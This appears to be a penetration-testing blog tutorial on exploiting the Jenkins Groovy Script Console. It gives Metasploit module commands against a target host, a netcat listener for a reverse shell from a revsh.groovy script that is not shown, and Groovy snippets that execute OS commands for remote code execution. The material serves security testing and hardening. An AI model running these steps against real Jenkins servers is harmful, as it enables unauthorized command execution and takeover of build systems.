Categories

Archives

Hacking Tools, Penetration Testing

Exploiting Jenkins Groovy Script Console in Multiple Ways

There were so many possibilities to exploit Jenkins however we were interested in Script Console because Jenkins has lovely Groovy script console that permits anyone to run arbitrary Groovy scripts inside the Jenkins master runtime.

Table of Content

  • Jenkins Groovy Script Console
  • Exploit Groovy Script Console using Metasploit
  • revsh.groovy
  • Groovy executing shell commands -I
  • Groovy executing shell commands -II

Jenkins Groovy Script Console

Jenkins features a nice Groovy script console which allows one to run arbitrary Groovy scripts within the Jenkins master runtime or in the runtime on agents. It is a web-based Groovy shell into the Jenkins runtime. Groovy is a very powerful language which offers the ability to do practically anything Java can do including:

  • Create sub-processes and execute arbitrary commands on the Jenkins master and agents.
  • It can even read files in which the Jenkins master has access to on the host (like /etc/passwd)
  • Decrypt credentials configured within Jenkins.
  • Granting a normal Jenkins user Script Console Access is essentially the same as giving them Administrator rights within Jenkins.

Source: https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console

Exploit Groovy Script Console using Metasploit

This module uses the Jenkins-CI Groovy script console to execute OS commands using Java.

use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > set rhost 192.168.1.106
msf exploit(jenkins_script_console) > set rport 8484
msf exploit(jenkins_script_console) > set targeturi /
msf exploit(jenkins_script_console) > set target 0
msf exploit(jenkins_script_console) > exploit

Metasploit uses command stager to exploit against command injection.

Hence, you can observe, that it has given meterpreter session of the victim’s machine.

revsh.groovy

Suppose if you found Jenkins without login password or you are a normal user who has permission to access script console then you can exploit this privilege to get the reverse shell of the machine. At Jenkins Dashboard go to Manage Jenkins and then select Script Console.

At script console, you have full privilege to run any program code, therefore I try to execute following piece of code which I had taken from Github to get the reverse connection on my local machine via netcat listener.

nc -lvp 1234

Once the above script will be executed, it will give netcat session of the victim’s machine.

Groovy executing shell commands -I

Similarly, with the help of following the piece of code which I found from this here, I try to create RCE for executing OS command through groovy script console. 

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'ipconfig'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Once you will run the script, it will execute the command given inside the code. you can observe result where we have fetched network configuration due to ipconfig command.

 

Groovy executing shell commands -II

Similarly, I found another very small piece of code to exploit the Groovy Console from here, which will generate RCE and execute the shell command.

def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");

Again you will run the script, it will execute the command given inside the code. you can observe result where we have fetched directory list due to dir command.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

5 thoughts on “Exploiting Jenkins Groovy Script Console in Multiple Ways

Comments are closed.